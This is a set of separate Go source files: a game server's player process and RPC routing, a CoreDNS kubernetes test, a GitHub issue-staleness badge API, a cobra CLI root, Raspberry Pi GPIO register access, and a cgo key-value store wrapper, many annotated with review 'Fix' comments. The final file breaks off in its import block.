// HandleRPCCall synchronously routes an inter-server RPC to the player's
// process and returns the encoded response bytes.
func HandleRPCCall(accountId string, requestData []byte) ([]byte, error) {
	handler, params, err := ParseRequestData(requestData)
	if err != nil {
		return nil, err
	}
	result, err := CallPlayer(accountId, "handleRPCCall", handler, params)
	if err != nil {
		logger.ERR("HandleRPCCall failed: ", err)
		return nil, err
	}
	// handleRPCCall always returns *RPCReply, so this assertion is safe.
	reply := result.(*RPCReply)
	return EncodeResponseData(reply.EncodeMethod, reply.Response)
}
// HandleRPCCast fire-and-forgets an inter-server RPC to the player's
// process; any response is discarded.
func HandleRPCCast(accountId string, requestData []byte) {
	CastPlayer(accountId, "handleRPCCast", requestData)
}
// CallPlayer performs a synchronous call into the player's process,
// starting the process on demand.
func CallPlayer(accountId string, args ...interface{}) (interface{}, error) {
	if !gen_server.Exists(accountId) {
		if err := StartPlayer(accountId); err != nil {
			return nil, err
		}
	}
	return gen_server.Call(accountId, args...)
}
// CastPlayer sends an asynchronous message to the player's process,
// starting the process on demand. Startup errors are ignored, matching
// the fire-and-forget nature of a cast.
func CastPlayer(accountId string, args ...interface{}) {
	if gen_server.Exists(accountId) {
		gen_server.Cast(accountId, args...)
		return
	}
	StartPlayer(accountId)
	gen_server.Cast(accountId, args...)
}
/*
GenServer Callbacks
*/
// Init is the gen_server startup callback; args[0] is the player/account
// id. It creates the in-memory store, records activity, arms the idle
// and persist timers, and attempts to attach the session. A failed
// session lookup is logged but does not abort startup.
func (self *Player) Init(args []interface{}) (err error) {
	name := args[0].(string)
	fmt.Println("Player: ", name, " started!")
	self.PlayerId = name
	self.Store = memstore.New(name, self)
	self.lastActive = time.Now().Unix()
	self.startActiveCheck()
	self.startPersistTimer()
	session, err := session_utils.Find(self.PlayerId)
	if err != nil {
		logger.ERR("Player lookup session failed: ", self.PlayerId, " err: ", err)
	} else {
		self.Session = session
		// Ensure the scene this player belongs to is loaded on this node.
		scene_mgr.TryLoadScene(session.SceneId)
	}
	return nil
}
// startPersistTimer schedules a one-shot "PersistData" cast after five
// minutes; the cast handler re-arms the timer, producing a periodic
// flush of the player's data.
func (self *Player) startPersistTimer() {
	self.persistTimer = time.AfterFunc(300*time.Second, func() {
		gen_server.Cast(self.PlayerId, "PersistData")
	})
}
// HandleCast is the gen_server asynchronous-message callback; args[0]
// is the method name and the remaining args are method-specific.
//
// Fix: the "handleAsyncWrap" branch asserted args[0] (the method-name
// string) to func(), which always panicked — the callback travels in
// args[1]. The if/else chain is also converted to a switch.
func (self *Player) HandleCast(args []interface{}) {
	switch args[0].(string) {
	case "handleRequest":
		self.handleRequest(args[1].([]byte))
	case "handleRPCCast":
		self.handleRPCCast(args[1].([]byte))
	case "handleWrap":
		self.handleWrap(args[1].(func(player *Player) interface{}))
	case "handleAsyncWrap":
		self.handleAsyncWrap(args[1].(func()))
	case "PersistData":
		// Flush models, then re-arm the periodic persist timer.
		self.Store.Persist([]string{"models"})
		self.startPersistTimer()
	case "removeConn":
		//self.Conn = nil
	case "broadcast":
		self.handleBroadcast(args[1].(*broadcast.BroadcastMsg))
	case "connected":
		self.stream = args[1].(pb.RouteConnectGame_AgentStreamServer)
	case "disconnected":
		self.stream = nil
	}
}
// HandleCall is the gen_server synchronous-message callback; it returns
// the handler result to the caller. Unknown methods yield (nil, nil).
func (self *Player) HandleCall(args []interface{}) (interface{}, error) {
	switch args[0].(string) {
	case "handleWrap":
		return self.handleWrap(args[1].(func(player *Player) interface{})), nil
	case "handleRPCCall":
		return self.handleRPCCall(args[1].(routes.Handler), args[2])
	}
	return nil, nil
}
// Terminate is the gen_server shutdown callback: it stops the timers and
// makes a final attempt to persist the player's data, failing the
// shutdown if persistence cannot be confirmed.
//
// Fix: corrected the "Termiante" typo in the debug message.
func (self *Player) Terminate(reason string) (err error) {
	fmt.Println("callback Terminate!")
	self.activeTimer.Stop()
	self.persistTimer.Stop()
	self.Store.Persist([]string{"models"})
	if ok := memstore.EnsurePersisted(self.PlayerId); !ok {
		return errors.New("Persist player data failed!")
	}
	return nil
}
// startActiveCheck stops the player once it has been idle for more than
// EXPIRE_DURATION seconds; otherwise it re-arms itself to check again in
// ten seconds.
func (self *Player) startActiveCheck() {
	if (self.lastActive + EXPIRE_DURATION) < time.Now().Unix() {
		gen_server.Stop(self.PlayerId, "Shutdown inActive player!")
	} else {
		self.activeTimer = time.AfterFunc(10*time.Second, self.startActiveCheck)
	}
}
/*
IPC Methods
*/
// SystemInfo reports the number of logical CPUs on this host.
func (self *Player) SystemInfo() int {
	return runtime.NumCPU()
}
// SendData encodes msg with the named API encoder and pushes the result
// down the player's client stream.
func (self *Player) SendData(encode_method string, msg interface{}) error {
	writer, err := api.Encode(encode_method, msg)
	if err != nil {
		return err
	}
	return self.sendToClient(writer.GetSendData())
}
// handleRequest decodes and executes one client request, sending either
// the handler's response or an error frame back to the client. In
// non-debug builds a panicking handler is caught and logged so a single
// bad request cannot kill the player process.
func (self *Player) handleRequest(data []byte) {
	self.lastActive = time.Now().Unix()
	if !gosconf.IS_DEBUG {
		// Contain handler panics in production; in debug mode, let them
		// crash loudly so they get noticed.
		defer func() {
			if x := recover(); x != nil {
				logger.ERR("caught panic in player handleRequest(): ", x)
			}
		}()
	}
	handler, params, err := ParseRequestData(data)
	if err != nil {
		logger.ERR(err)
		// The inner data/err deliberately shadow the outer ones: if the
		// error frame itself cannot be built, nothing is sent.
		data, err := failMsgData("error_route_not_found")
		if err == nil {
			self.sendToClient(data)
		}
	} else {
		data, err := self.processRequest(handler, params)
		if err != nil {
			data, err := failMsgData("error_msg_encoding_failed")
			if err == nil {
				self.sendToClient(data)
			}
		} else {
			self.sendToClient(data)
		}
	}
}
// handleRPCCall runs the routed handler and wraps its result for the RPC
// reply path.
func (self *Player) handleRPCCall(handler routes.Handler, params interface{}) (*RPCReply, error) {
	encode_method, response := handler(self, params)
	return &RPCReply{EncodeMethod: encode_method, Response: response}, nil
}
// handleRPCCast runs a routed handler for a cast-style RPC; the encoded
// response produced by processRequest is intentionally discarded.
func (self *Player) handleRPCCast(data []byte) {
	handler, params, err := ParseRequestData(data)
	if err != nil {
		logger.ERR("handleRPCCast failed: ", err)
		return
	}
	self.processRequest(handler, params)
}
// ParseRequestData splits a raw request frame into its routed handler
// and decoded params. The frame starts with a uint16 protocol id that is
// mapped to an API method name for routing and decoding.
//
// Fix: corrected the "handelRequest" typo in the info log.
func ParseRequestData(data []byte) (routes.Handler, interface{}, error) {
	reader := packet.Reader(data)
	protocol := reader.ReadUint16()
	decode_method := api.IdToName[protocol]
	handler, err := routes.Route(decode_method)
	logger.INFO("handleRequest: ", decode_method)
	if err != nil {
		return nil, nil, err
	}
	params, err := api.Decode(decode_method, reader)
	return handler, params, err
}
// EncodeResponseData encodes response with the named API encoder and
// returns the wire bytes, logging any encoding failure.
func EncodeResponseData(encode_method string, response interface{}) ([]byte, error) {
	writer, err := api.Encode(encode_method, response)
	if err == nil {
		return writer.GetSendData(), nil
	}
	logger.ERR("EncodeResponseData failed: ", err)
	return nil, err
}
// processRequest runs the handler, bumps the processed counter, and
// encodes the handler's response for sending.
func (self *Player) processRequest(handler routes.Handler, params interface{}) ([]byte, error) {
	encode_method, response := handler(self, params)
	self.processed++
	logger.INFO("Processed: ", self.processed, " Response Data: ", response)
	return EncodeResponseData(encode_method, response)
}
// sendToClient pushes raw bytes down the player's gRPC stream, or
// returns an error if the player currently has no connection.
func (self *Player) sendToClient(data []byte) error {
	if self.stream == nil {
		errMsg := "sendToClient failed, connectAppId is nil!"
		logger.WARN(errMsg)
		return errors.New(errMsg)
	}
	err := self.stream.Send(&pb.RouteMsg{
		Data: data,
	})
	if err != nil {
		logger.ERR("sendToClient failed: ", err)
	}
	return err
}
// handleWrap runs fun against this player inside the player's own
// process and returns its result, refreshing the activity timestamp.
func (self *Player) handleWrap(fun func(ctx *Player) interface{}) interface{} {
	self.lastActive = time.Now().Unix()
	return fun(self)
}

// handleAsyncWrap runs fun inside the player's own process, refreshing
// the activity timestamp; the function's side effects are its only
// output.
func (self *Player) handleAsyncWrap(fun func()) {
	self.lastActive = time.Now().Unix()
	fun()
}

// handleBroadcast forwards a channel broadcast to the
// application-installed BroadcastHandler, if any.
func (self *Player) handleBroadcast(msg *broadcast.BroadcastMsg) {
	if BroadcastHandler != nil {
		BroadcastHandler(self, msg)
	}
}
/*
IPC Methods
*/
// Wrap executes fun in the context of targetPlayerId's process and
// returns its result. When the target is this player the call runs
// inline, avoiding a synchronous self-call through gen_server.
func (self *Player) Wrap(targetPlayerId string, fun func(ctx *Player) interface{}) (interface{}, error) {
	if self.PlayerId != targetPlayerId {
		return CallPlayer(targetPlayerId, "handleWrap", fun)
	}
	return self.handleWrap(fun), nil
}
// AsyncWrap executes fun asynchronously in the context of
// targetPlayerId's process; when the target is this player the call is
// run inline.
//
// Fix: the cast previously used "HandleAsyncWrap", which no HandleCast
// branch matches (the dispatcher checks "handleAsyncWrap"), so remote
// async wraps were silently dropped.
func (self *Player) AsyncWrap(targetPlayerId string, fun func()) {
	if self.PlayerId == targetPlayerId {
		self.handleAsyncWrap(fun)
	} else {
		CastPlayer(targetPlayerId, "handleAsyncWrap", fun)
	}
}
// JoinChannel subscribes this player to a broadcast channel.
func (self *Player) JoinChannel(channel string) {
	gen_server.Cast(gslib.BROADCAST_SERVER_ID, "JoinChannel", self.PlayerId, channel)
}

// LeaveChannel unsubscribes this player from a broadcast channel.
func (self *Player) LeaveChannel(channel string) {
	gen_server.Cast(gslib.BROADCAST_SERVER_ID, "LeaveChannel", self.PlayerId, channel)
}

// PublishChannelMsg broadcasts data to every subscriber of channel,
// tagged with this player as the sender.
func (self *Player) PublishChannelMsg(channel, category string, data interface{}) {
	msg := &broadcast.BroadcastMsg{
		Category: category,
		Channel:  channel,
		SenderId: self.PlayerId,
		Data:     data,
	}
	gen_server.Cast(gslib.BROADCAST_SERVER_ID, "Publish", msg)
}
// failMsgData builds the wire bytes for a "Fail" frame carrying the
// given error message.
func failMsgData(errorMsg string) ([]byte, error) {
	writer, err := api.Encode("Fail", &api.Fail{Fail: errorMsg})
	if err == nil {
		return writer.GetSendData(), nil
	}
	logger.ERR("Encode msg failed: ", err)
	return nil, err
}
|
package kubernetes
import (
"testing"
"time"
"github.com/coredns/coredns/plugin/test"
intTest "github.com/coredns/coredns/test"
"github.com/miekg/dns"
)
// tests lists the DNS queries sent to the test CoreDNS instance and the
// answers expected from the kubernetes plugin.
var tests = []test.Case{
	{
		Qname: "svc-1-a.test-1.svc.cluster.local.", Qtype: dns.TypeA,
		Rcode: dns.RcodeSuccess,
		Answer: []dns.RR{
			test.A("svc-1-a.test-1.svc.cluster.local. 303 IN A 10.96.0.100"),
		},
	},
}
// TestKubernetesSecureAPI starts a CoreDNS instance that reaches the
// test cluster through a kubeconfig (secure API access) and verifies
// that service records resolve.
//
// Fix: the Corefile only closed the kubernetes plugin block; the
// enclosing ".:0 {" server block was never closed, which fails Corefile
// parsing.
func TestKubernetesSecureAPI(t *testing.T) {
	corefile :=
		`.:0 {
    kubernetes cluster.local {
        kubeconfig /home/circleci/.kube/kind-config-kind kind-kind
    }
}`
	server, udp, _, err := intTest.CoreDNSServerAndPorts(corefile)
	if err != nil {
		t.Fatalf("Could not get CoreDNS serving instance: %s", err)
	}
	defer server.Stop()
	// Work-around for timing condition that results in no-data being returned in test environment.
	time.Sleep(3 * time.Second)
	for _, tc := range tests {
		c := new(dns.Client)
		m := tc.Msg()
		res, _, err := c.Exchange(m, udp)
		if err != nil {
			t.Fatalf("Could not send query: %s", err)
		}
		if err := test.SortAndCheck(res, tc); err != nil {
			t.Error(err)
		}
	}
}
|
package main
import (
"fmt"
"golangStudy/struct/obj/fengzhuang/account/model"
)
// main demonstrates the encapsulated account model: construct an account
// and drive its setters.
func main() {
	acct := model.NewAccount("555555", 10, "555555")
	if acct == nil {
		fmt.Println("创建失败")
		return
	}
	fmt.Println(acct)
	acct.SetAccontNo("555555")
	acct.SetPassword("555555")
	acct.SetBalance(50)
}
|
package api
import (
"encoding/json"
"fmt"
"github.com/gorilla/mux"
"net/http"
"strconv"
"strings"
"sort"
"time"
)
// Len reports the number of points (sort.Interface).
func (p pointSlice) Len() int {
	return len(p)
}

// Less orders points chronologically by Date (sort.Interface).
func (p pointSlice) Less(i, j int) bool {
	return p[i].Date.Before(p[j].Date)
}

// Swap exchanges two points (sort.Interface).
func (p pointSlice) Swap(i, j int) {
	p[i], p[j] = p[j], p[i]
}
// reverse flips the order of ss in place.
func reverse(ss []Issue) {
	for i, j := 0, len(ss)-1; i < j; i, j = i+1, j-1 {
		ss[i], ss[j] = ss[j], ss[i]
	}
}
// LoadKey fetches the GitHub API key from the database into api.Key and
// logs whether one was found.
func (api *API) LoadKey() {
	api.Key = api.Database.Find("key")
	if api.Key == "" {
		fmt.Printf("key not loaded\n")
		return
	}
	fmt.Printf("key loaded\n")
}
// GenerateIssueChart builds (or fetches from cache) the open/closed
// issue chart for a repository. Cached charts live under
// "issue/<repo>"; otherwise the chart is computed from the repository's
// issues and written back with the same TTL as the repo entry.
// Issues labelled "issue/ignore" are excluded.
//
// Fix: the average-duration computation divided by Open+Closed
// unconditionally, panicking with a divide-by-zero for repositories
// with no counted issues.
func (api *API) GenerateIssueChart(repoString string) IssueChart {
	var a IssueChart
	var open Dataset
	var closed Dataset
	res := api.Database.Find("issue/" + repoString)
	if res != "" {
		if err := json.Unmarshal([]byte(res), &a); err != nil {
			fmt.Printf("%v", err.Error())
		}
		return a
	}
	open.Label = "Open Issues"
	closed.Label = "Closed Issues"
	a.Name = repoString
	repo := api.GetRepo(repoString)
	startTime := time.Now()
	for _, issue := range repo.Issues {
		var openTime time.Duration
		var point Point
		ignore := false
		for _, label := range issue.Labels {
			if label.Name == "issue/ignore" {
				ignore = true
			}
		}
		if ignore {
			continue
		}
		point.Link = issue.URL
		if issue.State == "open" {
			a.Open += 1
			// Open issues age from creation until now, in seconds.
			openTime = startTime.Sub(issue.Created) / time.Second
			point.Label = issue.Name + " - " + strconv.Itoa(issue.Number)
			point.Value = int64(openTime)
			open.Points = append([]Point{point}, open.Points...)
		} else {
			openTime = issue.Closed.Sub(issue.Created) / time.Second
			point.Label = issue.Name + " - " + strconv.Itoa(issue.Number)
			point.Value = int64(openTime)
			closed.Points = append([]Point{point}, closed.Points...)
			a.Closed += 1
		}
		a.AvgDuration += openTime
		if openTime > a.MaxDuration {
			a.MaxDuration = openTime
		}
	}
	a.Data = append(a.Data, open)
	a.Data = append(a.Data, closed)
	// Guard against repositories with zero counted issues.
	if total := a.Open + a.Closed; total > 0 {
		a.AvgDuration /= time.Duration(total)
	}
	api.Database.Set("issue/"+repoString, a)
	api.Database.Expire("issue/"+repoString, api.Database.TTL(repoString)/time.Second)
	return a
}
// GenerateStaleness derives a staleness summary from the repository's
// issue chart: the average age of open issues, the maximum issue
// duration, their ratio, and a human-readable verdict.
//
// Fixes: guard against an empty Data slice (possible when a cached
// chart unmarshals without datasets, which previously panicked on
// a.Data[0]) and against a zero MaxDuration, which previously produced
// a NaN/Inf ratio.
func (api *API) GenerateStaleness(repoString string) Staleness {
	a := api.GenerateIssueChart(repoString)
	var stl Staleness
	if len(a.Data) > 0 {
		for _, issue := range a.Data[0].Points {
			stl.Stale += issue.Value
		}
		if len(a.Data[0].Points) > 0 {
			stl.Stale /= int64(len(a.Data[0].Points))
		}
	}
	stl.Max = int64(a.MaxDuration)
	if stl.Max > 0 {
		stl.Ratio = float32(stl.Stale) / float32(stl.Max)
	}
	if stl.Ratio >= .75 {
		stl.Text = "Appears Stale"
	} else if stl.Ratio >= .5 {
		stl.Text = "Slightly stale"
	} else {
		stl.Text = "Active Development"
	}
	return stl
}
// GetStaleHandler serves the staleness summary for /{owner}/{repo} as
// JSON.
func (api *API) GetStaleHandler(w http.ResponseWriter, r *http.Request) {
	vars := mux.Vars(r)
	repoString := vars["owner"] + "/" + vars["repo"]
	stl := api.GenerateStaleness(repoString)
	WriteJSON(w, stl)
}
// GetBadgeHandler serves an SVG badge reflecting the repository's
// staleness ratio. CORS is opened and caching disabled so embedded
// badges stay current.
func (api *API) GetBadgeHandler(w http.ResponseWriter, r *http.Request) {
	w.Header().Set("Access-Control-Allow-Origin", "*")
	w.Header().Set("Cache-Control", "no-cache")
	vars := mux.Vars(r)
	repoString := vars["owner"] + "/" + vars["repo"]
	stl := api.GenerateStaleness(repoString)
	switch {
	case stl.Ratio >= .75:
		http.ServeFile(w, r, "stale.svg")
	case stl.Ratio >= .5:
		http.ServeFile(w, r, "getting_stale.svg")
	default:
		http.ServeFile(w, r, "looking_good.svg")
	}
}
// GetIssueChart serves the open/closed issue chart for /{owner}/{repo}
// as JSON.
func (api *API) GetIssueChart(w http.ResponseWriter, r *http.Request) {
	vars := mux.Vars(r)
	repoString := vars["owner"] + "/" + vars["repo"]
	a := api.GenerateIssueChart(repoString)
	WriteJSON(w, a)
}
// ValidHandler reports (JSON "true"/"false") whether the named GitHub
// repository exists, consulting the local cache first and warming it on
// a successful remote lookup.
//
// Fixes: a failed http.Get previously fell through and dereferenced a
// nil response (panic), and the response body was never closed (leaked
// connections).
func (api *API) ValidHandler(w http.ResponseWriter, r *http.Request) {
	vars := mux.Vars(r)
	repoString := vars["owner"] + "/" + vars["repo"]
	res := api.Database.Find(repoString)
	url := "https://api.github.com/repos/" + repoString
	if res != "" {
		WriteJSON(w, "true")
		return
	}
	resp, err := http.Get(url)
	if err != nil {
		fmt.Printf("%v", err.Error())
		WriteJSON(w, "false")
		return
	}
	defer resp.Body.Close()
	var repo Repository
	json.NewDecoder(resp.Body).Decode(&repo)
	if repo.Name != "" {
		WriteJSON(w, "true")
		// Warm the cache so the next request is served locally.
		api.GetRepo(repoString)
	} else {
		WriteJSON(w, "false")
	}
}
// GetBarChart serves a date-sorted burndown series for /{owner}/{repo}:
// each issue contributes +weight at creation and, if closed, -weight at
// close time. Weight defaults to 1 and may be overridden via a
// "burndown"-style label whose suffix (from byte 9) is the weight.
func (api *API) GetBarChart(w http.ResponseWriter, r *http.Request) {
	vars := mux.Vars(r)
	repoString := vars["owner"] + "/" + vars["repo"]
	repo := api.GetRepo(repoString)
	var chart pointSlice
	for _, issue := range repo.Issues {
		weightStr := ""
		weighted := false
		for _, label := range issue.Labels {
			if strings.Contains(label.Name, "burndown") {
				weighted = true
				weightStr = label.Name[9:len(label.Name)]
				break
			}
		}
		val := 1
		if weighted {
			// A non-numeric suffix yields 0, matching the ignored error.
			val, _ = strconv.Atoi(weightStr)
		}
		chart = append(chart, Point{Label: strconv.Itoa(issue.Number), Value: int64(val), Date: issue.Created})
		if issue.State == "closed" {
			chart = append(chart, Point{Label: strconv.Itoa(issue.Number), Value: int64(-val), Date: issue.Closed})
		}
	}
	sort.Sort(chart)
	WriteJSON(w, chart)
}
// GetRepo returns the repository record (with its first 100 issues,
// commits, and pulls) for "owner/name", served from the local cache when
// possible and otherwise fetched from the GitHub API and cached for
// 6000 seconds.
//
// Fixes: every GitHub response body is now closed (all four were
// previously leaked), and a failed request returns early instead of
// dereferencing a nil response.
//
// NOTE(review): passing access_token as a query parameter is deprecated
// by GitHub; consider moving it to the Authorization header.
func (api *API) GetRepo(data string) Repository {
	data = strings.ToLower(data)
	url := "https://api.github.com/repos/" + data
	var repo Repository
	res := api.Database.Find(data)
	if res != "" {
		if err := json.Unmarshal([]byte(res), &repo); err != nil {
			fmt.Printf("%v", err.Error())
		}
		return repo
	}
	// fetchInto decodes one GitHub endpoint into dst, reporting success.
	fetchInto := func(u string, dst interface{}) bool {
		resp, err := http.Get(u)
		if err != nil {
			fmt.Printf("%v", err.Error())
			return false
		}
		defer resp.Body.Close()
		json.NewDecoder(resp.Body).Decode(dst)
		return true
	}
	// withKey appends the API key, when present, to raise rate limits.
	withKey := func(u string) string {
		if api.Key != "" {
			return u + "&access_token=" + api.Key
		}
		return u
	}
	if !fetchInto(url, &repo) {
		return repo
	}
	fetchInto(withKey(url+"/issues?state=all&per_page=100"), &repo.Issues)
	fetchInto(withKey(url+"/commits?state=all&per_page=100"), &repo.Commits)
	fetchInto(withKey(url+"/pulls?state=all&per_page=100"), &repo.Pulls)
	api.Database.Set(data, repo)
	api.Database.Expire(data, 6000)
	return repo
}
// GetRepoHandler serves the full cached repository record for
// /{owner}/{repo} as JSON.
func (api *API) GetRepoHandler(w http.ResponseWriter, r *http.Request) {
	vars := mux.Vars(r)
	repo := api.GetRepo(vars["owner"] + "/" + vars["repo"])
	WriteJSON(w, repo)
}
// IndexHandler serves the single-page front end.
func (api *API) IndexHandler(w http.ResponseWriter, r *http.Request) {
	http.ServeFile(w, r, "index.html")
}
func WriteJSON(w http.ResponseWriter, data interface{}) error {
w.Header().Set("Content-Type", "application/json")
b, err := json.MarshalIndent(data, "", " ")
if err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return err
}
w.Write(b)
return nil
}
|
package cmd
import (
"os"
"github.com/spf13/cobra"
)
// cmdSW is the root command of the sw CLI; subcommands are attached to
// it elsewhere in this package.
var cmdSW = &cobra.Command{
	Use:   "sw [COMMAND] [ARGS]",
	Short: "A tool for managing Swif workflows",
	Long:  `sw is a tool for managing Swif workflows.`,
}
// Execute runs the root sw command, exiting with a non-zero status on
// failure.
//
// Fix: exit with status 1 instead of -1; negative exit codes are not
// portable (on POSIX systems -1 is truncated to 255).
func Execute() {
	if err := cmdSW.Execute(); err != nil {
		os.Exit(1)
	}
}
|
package core
import (
"errors"
"os"
"reflect"
"syscall"
"unsafe"
"github.com/zyxar/berry/sys"
)
// Memory-mapped peripheral register banks (filled in by setup), each
// viewed as a []uint32 so registers can be addressed by word offset.
var (
	gpio  []uint32
	pwm   []uint32
	clk   []uint32
	pads  []uint32
	timer []uint32
	// Errors returned by pin operations.
	ErrUnknownMode       = errors.New("unknown pin-mode")
	ErrUnimplementedMode = errors.New("unimplemented pin-mode")
	ErrInvalidValue      = errors.New("invalid value")
	ErrInvalidPlatform   = errors.New("invalid platform")
)
// init maps the peripheral registers at package load; GPIO access is
// impossible without them, so failure is fatal by design.
func init() {
	if err := setup(); err != nil {
		panic(err.Error())
	}
}
// setup mmaps the SoC peripheral register blocks (GPIO, PWM, clock,
// pads, timer) into the package-level slices. It prefers DEV_GPIO_MEM
// and falls back to DEV_MEM. The peripheral base address is chosen from
// the hardware string reported by sys.CPUInfo.
func setup() (err error) {
	var file *os.File
	if file, err = os.OpenFile(DEV_GPIO_MEM, os.O_RDWR|os.O_SYNC|os.O_EXCL, 0); os.IsNotExist(err) {
		file, err = os.OpenFile(DEV_MEM, os.O_RDWR|os.O_SYNC|os.O_EXCL, 0)
	}
	if err != nil {
		return
	}
	// The fd can be closed once the mappings exist; mmap keeps them valid.
	defer file.Close()
	var piMemBase int64 = 0x3F000000
	cpuinfo, err := sys.CPUInfo()
	if err != nil {
		return
	}
	switch cpuinfo.Hardware {
	case "BCM2708":
		piMemBase = 0x20000000
	case "BCM2709":
		piMemBase = 0x3F000000
	default:
		err = ErrInvalidPlatform
		return
	}
	// Register-bank offsets from the peripheral base.
	var (
		padsMemBase  int64 = piMemBase + 0x00100000
		clockMemBase int64 = piMemBase + 0x00101000
		gpioMemBase  int64 = piMemBase + 0x00200000
		timerMemBase int64 = piMemBase + 0x0000B000
		pwmMemBase   int64 = piMemBase + 0x0020C000
	)
	// mmap maps one block and reinterprets the byte slice as []uint32 by
	// rewriting the slice header in place (len/cap divided by 4).
	var mmap = func(base int64) (p []uint32, err error) {
		var mem []byte
		if mem, err = syscall.Mmap(
			int(file.Fd()),
			base,
			MMAP_BLOCK_SIZE,
			syscall.PROT_READ|syscall.PROT_WRITE,
			syscall.MAP_SHARED); err != nil {
			return
		}
		s := *(*reflect.SliceHeader)(unsafe.Pointer(&mem))
		s.Len /= 4
		s.Cap /= 4
		p = *(*[]uint32)(unsafe.Pointer(&s))
		return
	}
	if gpio, err = mmap(gpioMemBase); err != nil {
		return
	}
	if pwm, err = mmap(pwmMemBase); err != nil {
		return
	}
	if clk, err = mmap(clockMemBase); err != nil {
		return
	}
	if pads, err = mmap(padsMemBase); err != nil {
		return
	}
	timer, err = mmap(timerMemBase)
	return
}
// Pin identifies a GPIO pin by number.
type Pin uint8
// Mode configures the pin according to m: INPUT/OUTPUT program the
// function-select registers (10 pins per word, 3 bits per pin); the
// PULL_* modes pulse the pull control (word 37) and clock (words 38+)
// registers with the settle delays the hardware sequence requires.
// PWM, clock, and software modes are not implemented.
//
// Fix: the INPUT/OUTPUT case declared sel/shift with ":=", shadowing
// the function-level variables (flagged by shadow analysis); it now
// assigns them. The unimplemented modes are collapsed into one case.
func (this Pin) Mode(m uint8) (err error) {
	p := uint8(this)
	var sel, shift uint8
	switch m {
	case INPUT, OUTPUT:
		sel = p / 10
		shift = (p % 10) * 3
		gpio[sel] = (gpio[sel] & ^(7 << shift)) | (uint32(m) << shift)
	case PULL_OFF, PULL_DOWN, PULL_UP:
		sel = p/32 + 38
		shift = p & 31
		gpio[37] = uint32(m-PULL_OFF) & 3
		DelayMicroseconds(1)
		gpio[sel] = 1 << shift
		DelayMicroseconds(1)
		gpio[37] = 0
		DelayMicroseconds(1)
		gpio[sel] = 0
		DelayMicroseconds(1)
	case PWM_OUTPUT, GPIO_CLOCK, SOFT_PWM_OUTPUT, SOFT_TONE_OUTPUT, PWM_TONE_OUTPUT:
		err = ErrUnimplementedMode
	default:
		err = ErrUnknownMode
	}
	return
}
// Input configures the pin as a digital input.
func (this Pin) Input() error {
	return this.Mode(INPUT)
}

// Output configures the pin as a digital output.
func (this Pin) Output() error {
	return this.Mode(OUTPUT)
}

// PullUp enables the pin's internal pull-up resistor.
func (this Pin) PullUp() error {
	return this.Mode(PULL_UP)
}

// PullDown enables the pin's internal pull-down resistor.
func (this Pin) PullDown() error {
	return this.Mode(PULL_DOWN)
}

// PullOff disables the pin's internal pull resistors.
func (this Pin) PullOff() error {
	return this.Mode(PULL_OFF)
}
// DigitalWrite drives the pin low or high by writing the pin's bit into
// the clear (word 10+) or set (word 7+) register bank; (p & 31) selects
// the bit within the 32-pin word.
func (this Pin) DigitalWrite(v uint8) error {
	p := uint8(this)
	switch v {
	case LOW:
		gpio[p/32+10] = 1 << (p & 31)
	case HIGH:
		gpio[p/32+7] = 1 << (p & 31)
	default:
		return ErrInvalidValue
	}
	return nil
}
// DigitalRead samples the pin's level from the level register bank
// (word 13+).
//
// Fix: the level bit must be selected with (p & 31), matching
// DigitalWrite; the previous "1 << p" shifts past the 32-bit word for
// pins >= 32, so those pins always read LOW.
func (this Pin) DigitalRead() uint8 {
	p := uint8(this)
	if (gpio[p/32+13] & (1 << (p & 31))) != 0 {
		return HIGH
	}
	return LOW
}
|
// Package cdb implements a Go wrapper around libkvdb, a simple
// key-value database library.
package cdb
/*
#cgo CFLAGS: -std=gnu99
#cgo LDFLAGS: -lkvdb -L.
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include "kvdb.h"
int test(void) { return 0; }
*/
import "C"
import (
"errors"
"unsafe"
"kv/db"
)
// Kvdb wraps a libkvdb database handle.
type Kvdb struct {
	fd C.kvdb_t
}
/*
KvdbOpen opens a database file with default parameters (block size is
the filesystem default and file permissions are 0666). Note there is no
mode argument: open semantics (create/read-write) are determined by the
underlying C library's kvdb_open.
*/
// KvdbOpen opens the database file at filename and returns a handle.
// NOTE(review): the result of C.kvdb_open is not checked for failure,
// so err is currently always nil — confirm libkvdb's failure sentinel
// and add a check.
func KvdbOpen(filename string) (db *Kvdb, err error) {
	db = new(Kvdb)
	cs := C.CString(filename)
	// C.CString allocates on the C heap; free after kvdb_open copies it.
	defer C.free(unsafe.Pointer(cs))
	db.fd = C.kvdb_open(cs)
	return db, nil
}
// Close releases the underlying database handle.
func (db *Kvdb)Close() {
	C.kvdb_close(db.fd)
}
// Get looks up key and returns its value; a non-zero C return code is
// reported as "not found".
func (db *Kvdb)Get(key uint64) (uint64, error) {
	var cv C.uint64_t
	ret := C.kvdb_get(db.fd, C.uint64_t(key), &cv)
	if ret!=0 {
		return 0, errors.New("not found")
	}
	return uint64(cv), nil
}

// Put stores value under key; a non-zero C return code is an error.
func (db *Kvdb)Put(key, value uint64) error {
	ret := C.kvdb_put(db.fd, C.uint64_t(key), C.uint64_t(value))
	if ret!=0 {
		return errors.New("error")
	}
	return nil
}

// Del removes key from the database; a non-zero C return code is an
// error.
func (db *Kvdb)Del(key uint64) error {
	ret := C.kvdb_del(db.fd, C.uint64_t(key))
	if ret!=0 {
		return errors.New("error")
	}
	return nil
}
// Next is an unimplemented stub: it always returns zeros and no error.
func (db *Kvdb)Next(sk uint64) (uint64, uint64, error) {
	return 0, 0, nil
}
// List iterates keys in [k1, k2] via a C cursor, invoking f for each
// key/value pair until f returns false or the cursor is exhausted.
func (db *Kvdb)List(k1, k2 uint64, f func (uint64, uint64) bool) error {
	var k, v C.uint64_t
	cur := C.kvdb_open_cursor(db.fd, C.uint64_t(k1), C.uint64_t(k2))
	defer C.kvdb_close_cursor(db.fd, cur)
	for cont := true; cont; {
		if ret := C.kvdb_get_next(db.fd, cur, &k, &v); ret < 0 {
			break
		}
		cont = f(uint64(k), uint64(v))
	}
	return nil
}
// cdbTest is a smoke check that *Kvdb satisfies the db.DB interface.
func cdbTest() {
	var d db.DB
	d, _ = KvdbOpen("test.kvdb")
	d.Close()
}
|
package constants
var (
	// CurrentUserKey is the lookup key under which the authenticated
	// user is stored (presumably in a request context or session —
	// confirm against the callers).
	CurrentUserKey = "currentUser"
)
|
package xds
import (
"time"
mesh_proto "github.com/kumahq/kuma/api/mesh/v1alpha1"
core_mesh "github.com/kumahq/kuma/pkg/core/resources/apis/mesh"
"github.com/kumahq/kuma/pkg/core/resources/model"
